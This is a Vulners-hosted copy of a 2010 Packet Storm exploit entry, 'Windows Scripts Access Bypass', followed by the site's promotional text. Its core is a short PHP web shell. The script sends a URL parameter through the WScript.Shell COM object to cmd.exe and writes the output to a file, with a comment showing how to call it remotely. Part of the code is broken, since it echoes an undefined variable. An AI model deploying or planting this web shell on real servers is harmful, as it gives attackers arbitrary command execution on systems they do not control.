Lucene search
K

Windows Scripts Access Bypass

🗓️ 09 Jan 2010 00:00:00Reported by Hussin XType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Windows Scripts Access Bypass vulnerability through COM objec

Code
`  
  
  
<?php  
// Windows Scripts Access Bypass Vulnerability  
// by : Hussin X  
// WwW.iq-ty.com<http://WwW.iq-ty.com>  
// use www.iq-ty.com/bypass.php?iq=dir<http://www.iq-ty.com/bypass.php?iq=dir> << or any commands  
// go to the iq-security.txt  
  
$iqsec = new COM("WScript.Shell");  
$iqsec->Run('c:\windows\system32\cmd.exe /c '.escapeshellarg($_GET[iq]).' > '.dirname($_SERVER[SCRIPT_FILENAME]).'/iq-security.txt');  
for ($i=0; $i<count($iqhost); $i++) {echo nl2br(htmlentities($iqhost[$i]));}  
  
  
?>  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Jan 2010 00:00Current
1.1Low risk
Vulners AI Score1.1
16